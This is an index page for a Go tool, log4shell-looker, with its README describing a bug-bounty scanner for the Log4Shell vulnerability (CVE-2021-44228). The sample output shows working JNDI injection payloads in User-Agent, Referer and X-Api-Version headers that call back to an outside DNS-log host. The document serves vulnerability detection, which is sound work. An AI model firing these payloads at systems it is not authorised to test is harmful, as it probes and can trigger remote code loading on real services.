Ecosyste.ms: Awesome

An open API service indexing awesome lists of open source software.

Awesome Lists | Featured Topics | Projects

https://github.com/ravro-ir/log4shell-looker

log4jshell vulnerability scanner for bug bounty
https://github.com/ravro-ir/log4shell-looker

bugbounty bugs java java-8 log4j log4j2 log4shell logger logging secuurity vulnerabilities vulnerability vulnerability-detection vulnerability-scanners

Last synced: 22 days ago
JSON representation

log4jshell vulnerability scanner for bug bounty

Host: GitHub
URL: https://github.com/ravro-ir/log4shell-looker
Owner: ravro-ir
Created: 2021-12-16T06:44:02.000Z (almost 3 years ago)
Default Branch: main
Last Pushed: 2021-12-21T02:09:31.000Z (almost 3 years ago)
Last Synced: 2024-08-05T17:30:18.965Z (4 months ago)
Topics: bugbounty, bugs, java, java-8, log4j, log4j2, log4shell, logger, logging, secuurity, vulnerabilities, vulnerability, vulnerability-detection, vulnerability-scanners
Language: Go
Homepage:
Size: 188 KB
Stars: 23
Watchers: 1
Forks: 4
Open Issues: 0
Metadata Files:
- Readme: README.md

Awesome Lists containing this project

awesome-hacking-lists - ravro-ir/log4shell-looker - log4jshell vulnerability scanner for bug bounty (Go)

README

        ## log4shell-looker a log4jshell vulnerability scanner for bug bounty

(Written in Go because, you know, "write once, run anywhere.")

This is a simple tool that can be used to find vulnerable instances of

log4j 1.x and 2.x (CVE-2021-44228) in installations of

Java software such as web applications.

The scan tool currently checks for discover log4shell vulnerability.
 

Current feature of tools: 

`Cookies`, `Content-Type`, `URL Path`, `User-Agent`, `Headers`

# Using the scanner

```bash

$ go run main.go --help

Usage of main:

  -mode string

        please usage mode [urlpath, header, useragent] (default "[urlpath, header, useragent, cookie, contents]")

  -url string

        please enter you url for scan (default "url")

$ go run main.go -mode=useragent -url=http://127.0.0.1:8080

[+++] Your domain generated :  rfcbd0.dnslog.cn

[+++] Your session is :  1s16v8k8fmrmd5rljun51lmur4

[***] Payload :  User-Agent:${jndi:ldap://rfcbd0.dnslog.cn/}

[---] Isn't to vulnerability CVE-2021-44228

#################### 0 ############################

[+++] Your domain generated :  rfcbd0.dnslog.cn

[+++] Your session is :  1s16v8k8fmrmd5rljun51lmur4

[***] Payload :  Referer:${jndi:ldap://rfcbd0.dnslog.cn/}

[---] Isn't to vulnerability CVE-2021-44228

#################### 2 ############################

[+++] Your domain generated :  rfcbd0.dnslog.cn

[+++] Your session is :  1s16v8k8fmrmd5rljun51lmur4

[***] Payload :  X-Api-Version:${jndi:ldap://rfcbd0.dnslog.cn/}

[***] DNS log result :  [["rfcbd0.dnslog.cn","172.253.238.4","2021-12-16 14:45:19"]]

[***] Is Vulnerability to CVE-2021-44228 - [critical]

```

# Building from source

Install a [Go compiler](https://golang.org/dl).

Run the following commands in the checked-out repository:

```

go run main.go -mode=header -url=https://www.example.com/

Or

go build -o main

```

(Add the appropriate `.exe` extension on Windows systems, of course.)

# Example 

```bash 

$ go run main.go -mode=header -url=http://127.0.0.1:8080/

```

![Header](https://github.com/ravro-ir/log4shell-looker/blob/main/img/header.PNG)

```bash 

$ go run main.go -mode=useragent -url=http://127.0.0.1:8080/

```

![Header](https://github.com/ravro-ir/log4shell-looker/blob/main/img/user_agent.PNG)

```bash 

$ go run main.go -mode=cookie -url=http://127.0.0.1:8080/

```

![Header](https://github.com/ravro-ir/log4shell-looker/blob/main/img/cookie.PNG)

```bash 

$ go run main.go -mode=urlpath -url=http://127.0.0.1:8080/

```

![Header](https://github.com/ravro-ir/log4shell-looker/blob/main/img/url_path.PNG)

```bash 

$ go run main.go -mode=contents -url=http://127.0.0.1:8080/

```

![Header](https://github.com/ravro-ir/log4shell-looker/blob/main/img/content_type.PNG)

# License

GNU General Public License, version 3

# Author

Ramin Farajpour Cami <>